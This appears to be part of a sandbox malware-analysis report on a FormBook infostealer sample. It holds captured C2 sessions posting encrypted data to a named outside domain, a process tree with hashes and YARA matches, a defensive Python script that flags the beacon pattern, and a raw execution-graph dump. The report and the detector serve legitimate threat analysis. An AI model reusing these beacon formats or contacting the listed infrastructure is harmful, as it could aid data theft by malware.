                                                                                      platform: hostinger
                                                                                      panel: hpanel
                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID: 22
Source IP: 192.168.2.6
Source Port: 50036
Destination IP: 217.196.55.202
Destination Port: 80
PID: 6392
Process: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:34:31.550024033 CET | 819 | OUT | POST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.empowermedeco.com
                                                                                      Origin: http://www.empowermedeco.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 236
                                                                                      Referer: http://www.empowermedeco.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 4e 41 69 77 32 43 63 4b 4c 71 2b 34 36 6e 6d 41 48 51 37 45 2f 4c 4f 36 6f 41 59 6c 4c 6a 33 79 6c 39 71 4b 30 42 4e 36 37 55 32 67 3d 3d
                                                                                      Data Ascii: U6YDsxW=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhNAiw2CcKLq+46nmAHQ7E/LO6oAYlLj3yl9qK0BN67U2g==
Dec 2, 2024 14:34:32.744534969 CET | 1085 | IN | HTTP/1.1 301 Moved Permanently
                                                                                      Connection: close
                                                                                      content-type: text/html
                                                                                      content-length: 795
                                                                                      date: Mon, 02 Dec 2024 13:34:32 GMT
                                                                                      server: LiteSpeed
                                                                                      location: https://www.empowermedeco.com/fo8o/
                                                                                      platform: hostinger
                                                                                      panel: hpanel
                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID: 23
Source IP: 192.168.2.6
Source Port: 50037
Destination IP: 217.196.55.202
Destination Port: 80
PID: 6392
Process: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:34:34.216739893 CET | 1832 | OUT | POST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.empowermedeco.com
                                                                                      Origin: http://www.empowermedeco.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1248
                                                                                      Referer: http://www.empowermedeco.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 66 6b 50 46 73 68 4a 77 48 57 61 48 4e 6e 79 33 44 6b 63 50 7a 63 2f 49 66 47 6e 42 37 32 7a 51 6a 57 4b 61 30 72 65 54 79 34 77 45 73 63 6b 71 41 54 48 37 75 4b 6c 42 6c 74 2b 35 54 38 46 65 47 6e 49 44 48 68 47 6a 4c 68 51 43 76 52 77 68 48 65 4d 74 49 51 4c 6f 31 75 6c 46 64 50 6d 2f 57 5a 6a 77 66 67 33 70 58 4c 71 4a 7a 4c 36 75 5a 6b 2f 68 53 68 4b 38 37 4a 2f 42 38 4e 6d 64 4e 76 45 72 53 51 6b 75 66 4c 38 68 42 41 36 7a 6a 45 68 79 49 36 76 47 75 55 67 48 32 73 38 31 [TRUNCATED]
Data Ascii: U6YDsxW= [TRUNCATED]
Dec 2, 2024 14:34:35.467267036 CET | 1085 | IN | HTTP/1.1 301 Moved Permanently
                                                                                      Connection: close
                                                                                      content-type: text/html
                                                                                      content-length: 795
                                                                                      date: Mon, 02 Dec 2024 13:34:35 GMT
                                                                                      server: LiteSpeed
                                                                                      location: https://www.empowermedeco.com/fo8o/
                                                                                      platform: hostinger
                                                                                      panel: hpanel
                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID: 24
Source IP: 192.168.2.6
Source Port: 50038
Destination IP: 217.196.55.202
Destination Port: 80
PID: 6392
Process: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:34:36.871335030 CET | 528 | OUT | GET /fo8o/?U6YDsxW=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&cPm=bL-XkPyPkF HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Host: www.empowermedeco.com
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 2, 2024 14:34:38.077128887 CET | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                                                      Connection: close
                                                                                      content-type: text/html
                                                                                      content-length: 795
                                                                                      date: Mon, 02 Dec 2024 13:34:37 GMT
                                                                                      server: LiteSpeed
                                                                                      location: https://www.empowermedeco.com/fo8o/?U6YDsxW=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&cPm=bL-XkPyPkF
                                                                                      platform: hostinger
                                                                                      panel: hpanel
                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body
Dec 2, 2024 14:34:38.077157021 CET | 9 | IN | Data Raw: 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: ></html>
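The sessions above show the injected process sending the same URI path (/fo8o/) and the same opaque form parameter name (U6YDsxW, plus cPm on the GETs) to more than one domain, with a fixed legacy IE8 User-Agent and a Referer that points back at the destination host. The 404 and 301 answers are consistent with the well-documented FormBook habit of cycling through a list of domains of which only some are live, so a detection keyed on the server's response would miss most of the beacons. As an added example that is not part of the Joe Sandbox report, the following Python parses request records of this shape and flags the cross-host reuse of path and parameter name; the sample records are constructed from the sessions on this page (bodies shortened), and the final www.example.com request is a made-up control that must not be flagged.

```python
"""Flag FormBook-style HTTP beacons: one URI path and one parameter name
reused against several unrelated hosts. Added example, not report code."""
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed from the session dumps on this page (bodies shortened).
# The last record is a made-up benign request used as a control.
SAMPLE_REQUESTS = [
    "GET /fo8o/?cPm=bL-XkPyPkF&U6YDsxW=bO1UBvtoHFNUmlWGmXL3o3L5Dhw HTTP/1.1\r\n"
    "Host: www.elettrosistemista.zip\r\n"
    "Connection: close\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)\r\n"
    "\r\n",
    "POST /fo8o/ HTTP/1.1\r\n"
    "Host: www.empowermedeco.com\r\n"
    "Origin: http://www.empowermedeco.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Referer: http://www.empowermedeco.com/fo8o/\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)\r\n"
    "\r\n"
    "U6YDsxW=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a",
    "GET /fo8o/?U6YDsxW=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MR&cPm=bL-XkPyPkF HTTP/1.1\r\n"
    "Host: www.empowermedeco.com\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)\r\n"
    "\r\n",
    # Control record (constructed, not from the report).
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    "\r\n",
]


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into the fields the detection needs.
    Parameter names are taken from the query string and, for form POSTs,
    from the body; values are deliberately ignored because FormBook's are
    encrypted and change on every beacon."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    names = [k for k, _ in parse_qsl(parts.query, keep_blank_values=True)]
    ctype = headers.get("content-type", "")
    if ctype.startswith("application/x-www-form-urlencoded"):
        names += [k for k, _ in parse_qsl(body, keep_blank_values=True)]
    referer = headers.get("referer")
    return {
        "method": method,
        "host": headers.get("host", ""),
        "path": parts.path,
        "params": sorted(set(names)),
        "user_agent": headers.get("user-agent", ""),
        "referer_host": urlsplit(referer).hostname if referer else None,
    }


def find_beacon_clusters(records: list, min_hosts: int = 2) -> dict:
    """Return {(path, param_name): [hosts]} for every path/parameter pair seen
    against at least `min_hosts` distinct Host values. A real web form lives
    on one site; the same path and parameter name across unrelated domains
    is the beacon pattern shown in the report, independent of status codes."""
    hosts_by_key = defaultdict(set)
    for rec in records:
        for name in rec["params"]:
            hosts_by_key[(rec["path"], name)].add(rec["host"])
    return {key: sorted(hosts) for key, hosts in hosts_by_key.items()
            if len(hosts) >= min_hosts}


def self_referring_posts(records: list) -> list:
    """Secondary signal: POSTs whose Referer host equals the Host header.
    Every POST on this page carries Referer http://<host>/fo8o/ although
    no browser ever loaded that page; FormBook fills the header itself."""
    return sorted({rec["host"] for rec in records
                   if rec["method"] == "POST" and rec["referer_host"] == rec["host"]})


if __name__ == "__main__":
    recs = [parse_request(r) for r in SAMPLE_REQUESTS]
    for (path, name), hosts in find_beacon_clusters(recs).items():
        print(f"{path} param {name!r} sent to {len(hosts)} hosts: {', '.join(hosts)}")
    print("self-referring POST hosts:", self_referring_posts(recs))
```

Run over a real proxy or Zeek http.log export, the same grouping yields the full domain list the sample cycles through, which is the artefact worth blocking; the 404 and 301 hosts are not safe to ignore, since the live C2 in the list looks identical on the wire.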


Target ID: 0
Start time: 08:30:39
Start date: 02/12/2024
Path: C:\Users\user\Desktop\CCE 30411252024.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\CCE 30411252024.exe"
Imagebase: 0xee0000
File size: 1'191'424 bytes
MD5 hash: ACE5B81F6392CA5CE9A2E0953E6D6E4E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 08:30:41
Start date: 02/12/2024
Path: C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\CCE 30411252024.exe"
Imagebase: 0xb80000
File size: 46'504 bytes
MD5 hash: 1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2318504585.0000000003310000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2318504585.0000000003310000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2319589382.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2319589382.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2317721202.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2317721202.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation: high
Has exited: true

Target ID: 5
Start time: 08:30:49
Start date: 02/12/2024
Path: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe"
Imagebase: 0x60000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4604764076.0000000002BC0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4604764076.0000000002BC0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation: high
Has exited: false

Target ID: 6
Start time: 08:30:50
Start date: 02/12/2024
Path: C:\Windows\SysWOW64\netbtugc.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\netbtugc.exe"
Imagebase: 0xfa0000
File size: 22'016 bytes
MD5 hash: EE7BBA75B36D54F9E420EB6EE960D146
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4603419849.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4603419849.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4603077046.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4603077046.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4603508977.0000000000930000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4603508977.0000000000930000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation: moderate
Has exited: false

Target ID: 12
Start time: 08:31:05
Start date: 02/12/2024
Path: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe"
Imagebase: 0x60000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4606386701.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4606386701.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation: high
Has exited: false

Target ID: 15
Start time: 08:31:18
Start date: 02/12/2024
Path: C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase: 0x7ff728280000
File size: 676'768 bytes
MD5 hash: C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Execution Graph

Execution Coverage: 3.8%
Dynamic/Decrypted Code Coverage: 0.4%
Signature Coverage: 7.2%
Total number of Nodes: 2000
Total number of Limit Nodes: 67
93831->93833 93834 f0ea4c 93831->93834 93980 f0ea9c 93833->93980 93997 f07c0e 47 API calls __getptd_noexit 93834->93997 93837 f0ea47 93998 f0ea73 LeaveCriticalSection __unlock_fhandle 93837->93998 93839->93739 93840->93743 93842 f0af6d __wsopen_helper 93841->93842 93843 f0af75 93842->93843 93844 f0af8d 93842->93844 93939 f07bda 47 API calls __getptd_noexit 93843->93939 93846 f0b022 93844->93846 93851 f0afbf 93844->93851 93944 f07bda 47 API calls __getptd_noexit 93846->93944 93847 f0af7a 93940 f07c0e 47 API calls __getptd_noexit 93847->93940 93850 f0b027 93945 f07c0e 47 API calls __getptd_noexit 93850->93945 93866 f0a8ed 93851->93866 93854 f0b02f 93946 f06e10 8 API calls __ftell_nolock 93854->93946 93855 f0afc5 93857 f0afd8 93855->93857 93858 f0afeb 93855->93858 93875 f0b043 93857->93875 93941 f07c0e 47 API calls __getptd_noexit 93858->93941 93860 f0af82 __wsopen_helper 93860->93804 93862 f0afe4 93943 f0b01a LeaveCriticalSection __unlock_fhandle 93862->93943 93863 f0aff0 93942 f07bda 47 API calls __getptd_noexit 93863->93942 93867 f0a8f9 __wsopen_helper 93866->93867 93868 f0a946 EnterCriticalSection 93867->93868 93869 f07cf4 __lock 47 API calls 93867->93869 93870 f0a96c __wsopen_helper 93868->93870 93871 f0a91d 93869->93871 93870->93855 93872 f0a928 InitializeCriticalSectionAndSpinCount 93871->93872 93873 f0a93a 93871->93873 93872->93873 93947 f0a970 LeaveCriticalSection _doexit 93873->93947 93876 f0b050 __ftell_nolock 93875->93876 93877 f0b0ac 93876->93877 93878 f0b08d 93876->93878 93908 f0b082 93876->93908 93882 f0b105 93877->93882 93883 f0b0e9 93877->93883 93957 f07bda 47 API calls __getptd_noexit 93878->93957 93881 f0b092 93958 f07c0e 47 API calls __getptd_noexit 93881->93958 93886 f0b11c 93882->93886 93963 f0f82f 49 API calls 